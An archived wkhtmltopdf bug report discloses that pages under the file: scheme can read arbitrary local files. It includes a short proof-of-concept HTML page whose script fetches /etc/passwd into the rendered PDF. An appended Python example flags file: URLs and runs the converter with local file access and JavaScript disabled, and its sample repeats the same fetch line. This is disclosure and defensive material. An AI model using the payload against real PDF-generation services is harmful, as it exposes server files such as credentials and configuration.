This repository was archived by the owner on Jan 2, 2023. It is now read-only.

The same origin policy allows local files to be read by default #4536

@1135

wkhtmltopdf version(s) affected:
All versions (<= 0.12.5)

OS information
All supported OS

Description
Because the same-origin policy is not strict enough, HTML files under the file domain can read any file.

How to reproduce

Create an HTML file named 111.html
The file contents are as follows.

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<body>

<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>

</body></html>

Convert HTML to PDF:

wkhtmltopdf  /tmp/111.html  /tmp/result.pdf

Expected behavior
View the contents of the file named result.pdf; you will see the contents of the file /etc/passwd!

Possible Solution
Make a strict same-origin policy or set a security option, to prevent HTML documents under the file domain from reading any files.
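
Added example (not from the issue or the wkhtmltopdf project): a Python pre-render check and invocation wrapper for the "security option" approach suggested above. It assumes a wkhtmltopdf build that supports `--disable-local-file-access`, `--allow` and `--disable-javascript`; the function names, `SAMPLE` and the paths are hypothetical.

```python
import re
import subprocess
from html.parser import HTMLParser

FILE_URL = re.compile(r"file:/[^\s\"'<>)]*", re.IGNORECASE)  # file: URLs in attributes and script/style text
# Constructed sample: the issue's XMLHttpRequest line plus a local image reference
SAMPLE = '''<html><body><img src="file:///tmp/logo.png">
<script>x=new XMLHttpRequest;x.open("GET","file:///etc/passwd");x.send();</script>
</body></html>'''

class LocalRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []    # (location, url) pairs
        self._in = None   # "script" or "style" while inside that element
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._in = tag
        for name, value in attrs:
            for url in FILE_URL.findall(value or ""):
                self.hits.append((f"<{tag} {name}>", url))
    def handle_endtag(self, tag):
        if tag == self._in:
            self._in = None
    def handle_data(self, data):
        if self._in:  # plain page text is ignored; only code and CSS are scanned
            for url in FILE_URL.findall(data):
                self.hits.append((f"<{self._in}> body", url))

def find_local_file_refs(html):
    """Triage signal only: string-built URLs in script will not match."""
    finder = LocalRefFinder()
    finder.feed(html)
    finder.close()
    return finder.hits

def hardened_command(html_path, pdf_path, allow_dirs=()):
    """argv with local file access and JavaScript off; --allow re-opens listed dirs only."""
    allow = [arg for d in allow_dirs for arg in ("--allow", d)]
    return ["wkhtmltopdf", "--disable-local-file-access", "--disable-javascript", *allow, html_path, pdf_path]

def render(html_path, pdf_path, allow_dirs=()):
    """Hypothetical wrapper: log file: references, then render with the hardened argv."""
    with open(html_path, encoding="utf-8", errors="replace") as f:
        hits = find_local_file_refs(f.read())
    for where, url in hits:
        print(f"warning: {html_path}: {where} references {url}")
    subprocess.run(hardened_command(html_path, pdf_path, allow_dirs), check=True, timeout=60)
    return hits
```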
